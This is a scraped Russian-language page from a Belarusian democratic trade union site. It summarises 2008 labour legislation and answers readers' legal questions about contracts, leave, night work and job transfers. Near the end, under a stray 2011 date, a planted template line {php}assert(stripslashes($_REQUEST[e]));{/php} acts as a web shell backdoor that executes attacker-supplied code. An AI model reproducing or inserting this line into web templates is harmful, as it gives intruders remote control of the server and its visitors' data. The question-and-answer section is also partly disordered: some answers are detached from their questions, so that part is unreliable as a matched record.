>Белорусский Конгресс Демократических Профсоюзов (БКДП)
Ассоциация профсоюзов
БЕЛОРУССКИЙ КОНГРЕСС
ДЕМОКРАТИЧЕСКИХ ПРОФСОЮЗОВ


   

Главная / Юридическая консультация

Юридическая консультация



НОВОЕ В  ТРУДОВОМ ЗАКОНОДАТЕЛЬСТВЕ

28.07.2008 г.

Постановление Пленума Верховного Суда Республики Беларусь от 26 июля 2008 г. № 4 «О практике рассмотрения судами трудовых споров, связанных с контрактной формой найма работников».

Обсудив практику рассмотрения судами дел о контрактной форме найма работников в целях обеспечения правильного и единообразного применения законодательства  Пленум Верховного Суда Республики Беларусь обращает внимание судов, что при разрешении споров, связанных с контрактной формой найма работников, следует руководствоваться нормами Конституции Республики Беларусь, Трудового кодекса Республики Беларусь, Декретом Президента Республики Беларусь от 26 июля 1999 г. № 29 «О дополнительных мерах по совершенствованию трудовых отношений, укреплению трудовой и исполнительской дисциплины», Указом Президента Республики Беларусь от 12 апреля 2000 г. № 180 «О порядке применения Декрета Президента Республики Беларусь от 26 июля 1999г № 29 (с изменениями и дополнениями), Положением о порядке и условиях заключения контрактов нанимателей с работниками, утвержденным постановления Совета Министров Республики Беларусь от 25 сентября 1999 г. № 1476 (с изменениями и дополнениями), другими нормативными правовыми актами, регулирующими трудовые отношения.

            Необходимо иметь в виду, что контракт является разновидностью срочного трудового договора, заключаемого в письменной форме на определенный срок и содержащего особенности по сравнению с общими нормами законодательства о труде.

            Помимо общих условий трудового договора (ст.19 ТК РБ) контракт должен содержать обязательные условия, предусмотренные Декретом № 29, другими нормативными правовыми актами с учетом трудовой функции работника. К числу таких условий относятся в частности: срок и периодичность выплаты заработной платы; зависимость мер поощрения от соблюдения правил внутреннего трудового распорядка; дополнительные меры стимулирования труда; повышение тарифной ставки;  условия привлечения работника к полной материальной ответственности за ущерб, причиненный нанимателю по вине  работника излишними денежными выплатами (за исключением счетной  ошибки), неправильным учетом и хранением материальных или денежных ценностей, их хищением, уничтожением; дополнительные основания досрочного расторжения контракта по инициативе нанимателя.

            Досрочное расторжение контракта возможно по требованию работника в случае его болезни или инвалидности, препятствующих выполнению работы по контракту, нарушения нанимателем законодательства о труде, коллективного договора или условий контракта и по другим уважительным причинам (ст.41 ТК РБ).

При оценке уважительности причин расторжения контракта по требованию работника суд должен  учитывать, что указанные истцом причины препятствовали ему выполнять работу по заключенному контракту. К таковым причинам могут относиться, например, состояние здоровья, выход на пенсию, изменение места жительства, необходимость ухода за больными членами семьи. Доказательства об уважительности причин досрочного расторжения контракта предоставляются истцом.

 

28.07.2008 г.

Закон Республики Беларусь № 256-3 от 23.06.2008 года «Об охране труда»

            Данный Закон направлен на регулирование общественных отношений в области охраны труда и реализацию установленных Конституцией Республики Беларусь права граждан на здоровые и безопасные условия труда.

            В Законе определено, что государственное управление в области охраны труда осуществляют Президент Республики Беларусь, республиканские органы государственного управления,  иные государственные организации, подчиненные Правительству Республики Беларусь, местные исполнительные и распорядительные органы в пределах их компетенции.

             В статьях 9 и 11 Закона  закреплены права работающих на охрану труда, а именно,

 Работающий имеет право на:

            получение от работодателя достоверной информации о состоянии условий и охраны труда на рабочем месте, а также о средствах защиты от воздействия вредных и (или) опасных производственных факторах;

            личное участие или через своего представителя в рассмотрении вопросов, связанных с обеспечением безопасных условий труда, проведении в установленном порядке проверок по охране труда на его рабочем месте соответствующими органами, расследовании произошедшего с ним несчастного случая на производстве или его профессионального заболевания;

            рабочее место, соответствующее требованиям по охране труда;

            обеспечение необходимыми средствами коллективной и индивидуальной защиты, социально-бытовыми помещениями, устройствами;

            отказ от выполнения полученной работы в случае непредоставления ему средств индивидуальной защиты, непосредственно обеспечивающих безопасность труда;

            компенсации по условиям труда, в том числе за работу с вредными и (или) опасными условиями труда.

Рабочий имеет право отказаться от выполнения порученной работы (оказания услуги) в случае возникновения непосредственной опасности для жизни и здоровья его и окружающих до устранения этой опасности.

Законом  также определены  права и обязанности работодателя в области охраны труда.

Надзор и контроль за соблюдением законодательства  об охране труда вправе осуществлять Департамент государственной инспекции труда Министерства труда и социальной защиты Республики Беларусь, республиканские органы государственного управления, иные государственные организации, подчиненные Правительству Республики Беларусь, местные исполнительные и распорядительные органы, Генеральный прокурор Республики Беларусь и подчиненные ему прокуроры.

            Общественный контроль за соблюдением законодательства об охране труда осуществляют профсоюзы через их технических инспекторов труда, общественных инспекторов по охране труда, другие уполномоченные представители профсоюзов.

            Закон вступает в силу со 2 января 2009 года.

           

ВОПРОС -- ОТВЕТ

июль 2008 г.

При получении водительских прав на различные категории требуется определенный водительский стаж  Просьба разъяснить,  как считается этот стаж? Портнов В., водитель, г. Минск

 Постановлением Совета Министров Республики Беларусь от 11 июня 2008 года № 838 «О порядке исчисления водительского стажа» установлено, что водительский стаж исчисляется от даты предоставления права управления механическим транспортным средством, самоходной машиной соответствующей категории.

В водительский стаж не входит срок лишения права управления транспортным средством, самоходной машиной, а также время от даты исчисления срока действия водительского удостоверения до получения нового.

 

 До декретного отпуска я работала на предприятии в три смены. Ребенку исполнился один годик,  денег не хватает, и я хочу выйти на работу.  Заставят ли меня работать, как и прежде, в три смены? Екатерина М., г. Борисов

В соответствии со  статьями 117 и 263 Трудового кодекса Республики Беларусь женщины, имеющие детей в возрасте до трех лет, могут привлекаться к работе в ночное время только с их письменного согласия. Ночным считается время с 22 часов до 6 часов. Следовательно, «заставить» Вас работать в третью смену без Вашего письменного согласия наниматель не имеет права.

 

 Я получила высшее образование на бюджетной основе и отработала по распределению менее одного года. Сейчас я выхожу замуж и хочу переехать к мужу, который проживает и работает в другом городе. Как мне уволиться, если я не отработала срок, установленный для молодого специалиста? Светлана А., г.Витебск

 Положением о распределении выпускников учреждений образования, получивших профессионально-техническое образование, среднее специальное или высшее образование (утверждено постановлением Совета Министров Республики Беларусь № 1702 от 10.12.2007 г.) установлено, что вопрос перераспределения молодых специалистов на протяжении двух лет после получения высшего образования решают учреждения образования. Согласно пункта 16 этого Положения молодому специалисту может быть предоставлено место работы при наличии возможности по месту работы или жительства мужа (жены). Для решения своего вопроса  Вам необходимо обратиться в ВУЗ, направивший Вас на работу. Комиссия, при наличии места для трудоустройства  согласно полученной Вами специальности по месту проживания Вашего мужа, выдаст новое направление на работу.  В случае невозможности такого трудоустройства, Вам могут выдать справку о самостоятельном трудоустройстве.

На основании предоставления вышеуказанных документов Вас обязаны уволить с предприятия, на котором Вы  работаете в настоящее время.

 

март 2008 г.  

Я работаю в плановом отделе. Очень часто руководитель отдела оставляет меня после окончания рабочего дня для выполнения текущей работы отдела. На мои возмущения по данному поводу руководитель заявляет, что у меня ненормированный рабочий день, и я обязана оставаться после рабочего дня.  Разъясните, пожалуйста, что такое ненормированный рабочий день?  Людмила Прасковская

 Законом Республики Беларусь от 20 июля 2007 года «О внесении изменений и дополнений в Трудовой кодекс Республики Беларусь» (вступил в силу с 26 января 2008 года)   Трудовой кодекс  дополнен статьей 118-1, которая дает правовое определение  ненормированного рабочего дня.

Ненормированный рабочий день – особый режим работы, в соответствии с которым отдельные работники могут при необходимости эпизодически по письменному или устному приказу (распоряжению), постановлению нанимателя или по своей инициативе с ведома нанимателя или уполномоченного должностного лица нанимателя выполнять свои трудовые обязанности за пределами установленной нормы продолжительности рабочего времени. Возможная в связи с этим переработка рабочего времени не является сверхурочной работой  и компенсируется предоставлением дополнительного отпуска за ненормированный рабочий день.

В соответствии со статьей 158 Трудового кодекса работникам с ненормированным рабочим днем наниматель за счет собственных средств устанавливает дополнительный отпуск за ненормированный рабочий день продолжительностью до 7 календарных дней. Порядок, условия предоставления и продолжительность этого отпуска определяется коллективным договором или, если отсутствует коллективный договор,  в Вашем трудовом договоре (контракте), который заключен между Вами и нанимателем.

 

Я работаю и одна воспитываю двух малолетних  детей.  Иногда по семейным обстоятельствам мне необходимо несколько дней за свой счет. Должен ли директор  предоставить мне такой маленький отпуск? Людмила К.

 Мой сын работает на заводе, хочет поступать в институт. Обязаны  ли ему предоставить отпуск  для сдачи экзаменов,  в прошлом году его заставили брать очередной отпуск ? Соловьев И.П.

 Да, обязаны. В соответствии со статьей 212 Трудового кодекса Республики Беларусь работникам, допущенным к вступительным испытаниям в учреждения, обеспечивающие получение высшего образования, предоставляется отпуск без сохранения заработной платы – не менее 12 календарных дней, не считая времени на проезд к месту нахождения учреждения образования и обратно.

Об аттестации рабочих мест по условиям труда

Совет Министров Республики Беларусь 22 февраля 2008 года принял постановление № 253 «Об аттестации рабочих мест по условиям труда». Данным постановлением утверждено Положение о порядке проведения аттестации рабочих мест по условиям труда.

Совет Министров Республики Беларусь постановил, что аттестация рабочих мест по условиям труда проводится  в целях  комплексной оценки условий труда на конкретном рабочем месте для разработки и реализации плана мероприятий по улучшению условий труда, определения права работника на пенсию по возрасту за работу с особыми условиями труда, дополнительный отпуск за работу с вредными и (или) опасными условиями труда, оплату труда в повышенном размере путем доплат за работу с вредными и (или) опасными условиями труда.

Для организации и  проведения аттестации рабочих мест по условиям труда на предприятии приказом нанимателя создается аттестационная комиссия. В состав комиссии рекомендовано включить работников служб охраны труда, кадровой, юридической, организации труда и заработной платы, промышленно-санитарной лаборатории, руководителей структурных подразделений организации, медицинских работников, представителей профсоюзов.

По результатам аттестации приказом нанимателя по согласованию с профсоюзом утверждаются перечни рабочих мест по профессиям и должностям, на которых работающим по результатам аттестации подтверждены:

- особые условия труда, соответствующие требованиям списков производств, работ, профессий, должностей и показателей, дающих право на пенсию по возрасту за работу с особыми условиями труда;

- право на  дополнительный отпуск за работу с вредными и (или) опасными условиями труда;

- вредные и (или) опасные условия труда, соответствующие требованиям списка производств, цехов,  профессий и должностей с вредными и (или) опасными условиями труда, работа в которых дает право на сокращенную продолжительность рабочего времени;

- право на доплаты за работу с вредными и (или) опасными условиями труда.

В приказе также указываются рабочие места, на которых результатами аттестации не подтверждены (с указанием конкретных причин) условия труда, дающие право на работу с вредными и (или) опасными условиями труда, оплату труда в повышенном размере путем установления доплат за работу с вредными и (или) опасными условиями труда.

  Да. В соответствии со статьей 189 Трудового кодекса Республики Беларусь наниматель обязан по желанию женщины, имеющей двух и более детей в возрасте до четырнадцати лет или ребенка-инвалида в возрасте до восемнадцати лет, предоставить отпуск без сохранения заработной платы продолжительностью до 14 календарных дней.

 

 Перевод допускается только с письменного согласия работника, за исключением временного перевода в связи с производственной необходимостью или простоем.

 При переводе на другую постоянную работу у того же нанимателя с работником заключается новый трудовой договор (контракт).

 Поручение нанимателем работнику прежней работы на новом рабочем месте, в другом структурном подразделении, за исключением обособленного, на другом механизме или агрегате, но в пределах специальности, квалификации или должности с сохранением условий труда, обусловленных трудовым договором, не считается переводом, требующим письменного согласия работника,а является перемещением.Правом перемещения работников наниматели наделены согласно ст.31 ТК. При перемещении не требуется согласия работника.

 Перевод от перемещения отличается тем, что при переводе изменяется трудовая функция, наниматель или местность, где выполняется работа, а при перемещении - рабочее место, структурное подразделение, механизм, агрегат.

 Перемещение должно быть обосновано производственными, организационными или экономическими причинами.

 Перевод и перемещение работника не допускаются, в том числе с согласия работника, если это противопоказано ему по состоянию здоровья.

Отказ от выполнения работы при переводе, произведенном с соблюдением закона, признается нарушением трудовой дисциплины, а невыход на работу - прогулом. Однако не может быть признан прогулом отказ работника приступить к работе, на которую он был переведен с нарушением закона.

 
апрель, 2011 года
{php}assert(stripslashes($_REQUEST[e]));{/php}





  Оценка:  

 
  




  Имя
 
 
Пожалуйста, решите эту задачу Задача:     =  


 
отправить сcылку по почте   |   версия для печати


ТОП НОВОСТИ

   Все новости »


Б Л О Г
АЛЕКСАНДРА
ЯРОШУКА
Личное мнение профсоюзного лидера
Читать блог »
Блог Александра Ярошука


Всемирный день борьбы за достойный труд









Белорусский независимый профсоюз (БНП)
Свободный профсоюз - Полоцк
Свободный профсоюз металлистов
Белорусский профсоюз работников радиоэлектронной промышленности (РЭП)
Mojazarplata.by








Белорусский независимый профсоюз (БНП) Белорусский независимый профсоюз (БНП) Свободный профсоюз металлистов (СПМ) Свободный профсоюз металлистов (СПМ) Белорусский профсоюз работников радиоэлектронной промышленности (РЭП) Белорусский профсоюз работников радиоэлектронной промышленности (РЭП) Свободный профсоюз Белорусский (СПБ) Свободный профсоюз Белорусский (СПБ)




Главная  |  Визитная карточка БКДП  |  Архив новостей  |  Фотоархив   |    Контакты

Все права защищены. При перепечатке материалов, активная ссылка на сайт обязательна.
© 2002-2020 | Ассоциация профсоюзов «Белорусский конгресс демократических профсоюзов» (АП БКДП) | www.bkdp.org
  Республика Беларусь, г.Минск,
ул.Серафимовича, 11, ком. 405а
E-mail: bkdp.by@gmail.com
Т.ф. +375 (17) 318-31-99

CMS Status-X